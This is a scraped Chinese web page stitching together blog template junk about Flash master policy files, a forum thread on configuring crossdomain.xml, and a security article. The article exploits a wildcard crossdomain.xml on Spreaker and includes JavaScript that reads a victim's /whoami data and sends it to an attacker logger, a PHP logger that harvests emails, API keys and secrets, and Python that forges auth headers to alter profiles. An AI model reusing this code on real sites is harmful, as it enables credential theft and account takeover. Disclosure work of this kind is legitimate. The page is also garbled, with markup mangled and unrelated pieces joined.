114网址导航温馨提示！由于新浪微博认证机制调整，您的新浪微博帐号绑定已过期，请重新绑定！&&|&&
linux系统维护超级QQ群：
个人博客地址：
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
阅读(5002)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
在LOFTER的更多文章
loftPermalink:'',
id:'fks_094075',
blogTitle:'主策略文件crossdomain.xml',
blogAbstract:'
默认情况下，Flash Player（和 AIR 应用程序沙箱以外的 AIR 内容）首先在服务器的根目录中查找名为 crossdomain.xml 的 URL 策略文件，然后在端口 843 上查找套接字策略文件。这些位置上的文件称为“主策略文件”。（对于套接字连接，Flash Player 还会在与主连接相同的端口上查找套接字策略文件。但是，在该端口上找到的策略文件并不视为主策略文件。）
除指定访问权限外，主策略文件还包含一条“元策略”语句。元策略指定哪些位置可包含策略文件。URL 策略文件的默认元策略为“master-only”，它表示 /crossdomain.xml 是服务器上唯一允许的策略文件。套接字策略文件的默认元策略为“all”，它表示主机上的任何套接字都能提供套接字策略文件。',
blogTag:'文件,策略,domain,flash,allow',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:7,
publishTime:1,
permalink:'blog/static/',
commentCount:0,
mainCommentCount:0,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'linux系统维护超级QQ群：\n个人博客地址：',
hmcon:'1',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人：
{list a as x}
{if !!b&&b.length>0}
他们还推荐了：
{list b as y}
转载记录：
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}flash跨域。crossdomain.xml中只允许某特定路径跨域该如何设置？【javascript吧】_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0成为超级会员，使用一键签到本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：143,877贴子：
flash跨域。crossdomain.xml中只允许某特定路径跨域该如何设置？收藏
我试了在根目录中加&site-control permitted-cross-domain-policies="all"/&再在特定子目录中加规则覆盖，但是没有成功。有了解这方面的人么？
千锋javascript 名师荟萃 汇聚html5前沿技术 全栈式教学模式 免费试学两周千锋javascript 0基础20周快速提升,成就html5实战精英 实战教学 学习就业无缝对接!
为啥没成功，抓包看看FLASH的请求，访问了子目录的crossdomain.xml吗？
根目录：&?xml version="1.0"?&&!DOCTYPE cross-domain-policy SYSTEM""&&cross-domain-policy&&site-control permitted-cross-domain-policies="all"/&&/cross-domain-policy&子目录：&?xml version="1.0"?&&!DOCTYPE cross-domain-policy SYSTEM""&&cross-domain-policy&&allow-access-from domain="*"/&&allow-http-request-headers-from domain="*" headers="*"/&&/cross-domain-policy&请求的是子目录下的内容。若把allow-access-from domain="*"加入根目录便能成功。
Flash跨域也分Socket跨域和HTTP跨域的。。。
登录百度帐号推荐应用
为兴趣而生，贴吧更懂你。或当前位置： && 知识详情
利用不安全的crossdomian.xml
阅读：7161次
1.介绍有些站点的crossdomian.xml配置不安全,比如我这次参加spreaker站点的bug boundtry,他们的:&cross-domain-policy&&allow-access-from domain=&*&/&&/cross-domain-policy&domain=&*&,意味着允许载入来自任何站点的swf文件,允许发送请求和读取响应信息,这相当于绕过了同源策略。2.利用接下来我查看利用你的api key和secret允许你轻松的读取公共信息而不需要验证,例如: 将返回所有关于“The bit a bit show”的公共信息,如果你想得到私有信息或者新建/修改数据,则需要认证。可以利用api key和secret来实现认证,通过打开 key和secret,保存好你的api key 和secret(因为他们不能修改) 包含所有登陆用户的敏感信息,包括userid , fullname , fbuserid , email , **apikey** , api secret , twauthtoken , twauthtoken_secret , fbauthtoken等等,同样的信息也可以在你可以自己编码actionscript,来请求,我们不太擅长编写actionscript,所以我使用CrossXHR,他能够代理js请求通过swf,换句话说,我们通过编码js就可以请求flash首先构造一个请求,代码如下function&test_get()&{
request&=&new&CrossXHR();
request.onreadystatechange&=&
request.open('GET',&'/whoami');
request.send();
然后把响应信息发给logger
data&=&request.responseT&//contain&the&content&of&the&/whoami
httpGet(&/poc/logger.php?data=&+data);&//send&it&to&logger
alert(&done&);&//just&for&demo最后建立logger,来接收。//receive&contetnt&via&data&param&,&then&parse&it
$data=$_GET['data'];&&&
$obj&=&json_decode($data);
$email&=&$obj-&{'response'}-&{'user'}-&{'email'};
$apikey&=&&$obj-&{'response'}-&{'user'}-&{'api_key'}-&{'key'};
$apisecret&=&&$obj-&{'response'}-&{'user'}-&{'api_key'}-&{'secret'};
$html&=&'&table&';
$html.=&'&tr&';
$html.=&'&td&User&Id&&/td&';
$html.=&'&td&Fullname&&/td&';
$html.=&'&td&email&&&/td&';
$html.='&/td&';
$html.='&td&';
$html.='&/td&';
$html.='&td&';
$file=fopen('data.html','a');
fwrite($file,&&br&&br&&\n&);
fwrite($file,$html.&\n\n\n&);
fwrite($file,&&br&&br&&\n&);
fclose($file);
....以上准备做好以后,我们可以让受害者访问我的站点,比如,当受害者此时正登陆spreaker站点的话,我们就能在logger里看到他的敏感信息了。得到受害者的api key 和 secret后,我们就可以参考账号到任意的社交媒体平台(twitter,facebook等),因为api key和secret无法修改,这也是一个永久性后门。除非你删除你的spreaker账号通过api key和secret实现认证后,会在以后的访问请求中增加Spreaker-Auth的HTTP头。我下面通过一段python代码来实现认证和修改用户的profileimport&random
import&time
import&hashlib,sys,requests,json
user_id&=&sys.argv[1]
api_key&&&&=&sys.argv[2]
api_secret&=&sys.argv[3]
#&Generate&a&nonce&and&get&the&current&timestamp&(from&epoch)
nonce&&&&&&=&random.randint(0,&)
timestamp&&=&int(time.time())
#&Generate&the&hash
md5&&&&&&&&=&hashlib.md5()
md5.update(&%s:%s:%s:%s&&%&(nonce,&api_key,&api_secret,&timestamp))
#&Generate&the&digest
digest&&&&&=&&%s:%s:%s:%s&&%&(nonce,&api_key,&timestamp,&md5.hexdigest())
print&'X-Spreaker-Auth:&%s'%(digest)
url&=&&/user/&+str(user_id)
payload&=&{'description':&'Hacked'}
headers&=&{'X-Spreaker-Auth':&digest}
r&=&requests.put(url,&params=payload,&headers=headers)
print&'response&code:&'&+&str(r.status_code)提交认证请求修改后的profile
本文由 安全客 原创发布，如需转载请注明来源及本文地址。本文地址：/learning/detail/2235.html
参与讨论，请先
安全播报APP
Copyright & 360网络攻防实验室 All Rights Reserved 京ICP证080047号[京ICP备号-6]}